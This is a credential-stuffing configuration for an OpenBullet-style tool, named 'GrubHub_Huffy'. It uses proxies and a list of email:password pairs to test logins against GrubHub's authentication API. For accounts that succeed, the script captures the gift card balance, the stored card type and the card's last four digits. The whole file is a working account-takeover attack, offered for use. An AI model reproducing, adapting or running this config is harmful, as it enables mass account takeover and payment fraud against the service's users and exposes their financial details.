[SETTINGS]
{
  "Name": "GrubHub_Huffy",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-08-27T20:27:45.0662864-06:00",
  "AdditionalInfo": "",
  "Author": "Huffy / Fixed by Romeo",
  "Version": "1.3.9 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION GetRandomUA -> VAR "UA" 

REQUEST POST "https://api-gtm.grubhub.com/auth" 
  CONTENT "{\"brand\":\"GRUBHUB\",\"client_id\":\"beta_UmWlpstzQSFmocLy3h1UieYcVST\",\"device_id\":1469286275,\"scope\":\"anonymous\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Referer: https://www.grubhub.com/login" 
  HEADER "Authorization: Bearer" 

PARSE "<SOURCE>" LR "access_token\":\"" "\"," -> VAR "token" 

REQUEST POST "https://api-gtm.grubhub.com/auth" 
  CONTENT "{\"brand\":\"GRUBHUB\",\"client_id\":\"beta_UmWlpstzQSFmocLy3h1UieYcVST\",\"device_id\":1469286275,\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <token>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Success OR 
    KEY "ud_id" 
  KEYCHAIN Retry OR 
    KEY "pxuuid" 

PARSE "<SOURCE>" LR "ud_id\":\"" "\",\"" -> VAR "id" 

PARSE "<SOURCE>" LR "access_token\":\"" "\",\"" -> VAR "token2" 

REQUEST GET "https://api-gtm.grubhub.com/codes/vault/<id>/giftcards" 
  
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Bearer <token2>" 

PARSE "<SOURCE>" LR "total_amount_remaining\":" "}" -> CAP "Total Gift Card Balance" "$" "" 

REQUEST GET "https://api-gtm.grubhub.com/payments/<id>/credit_card" 
  
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Referer: https://www.grubhub.com/account/payment" 
  HEADER "Authorization: Bearer <token2>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "[]" 

PARSE "<SOURCE>" LR "credit_card_type\":\"" "\",\"" -> CAP "Payment Type" 

PARSE "<SOURCE>" LR "last4\":\"" "\",\"" -> CAP "Last 4 digits" 

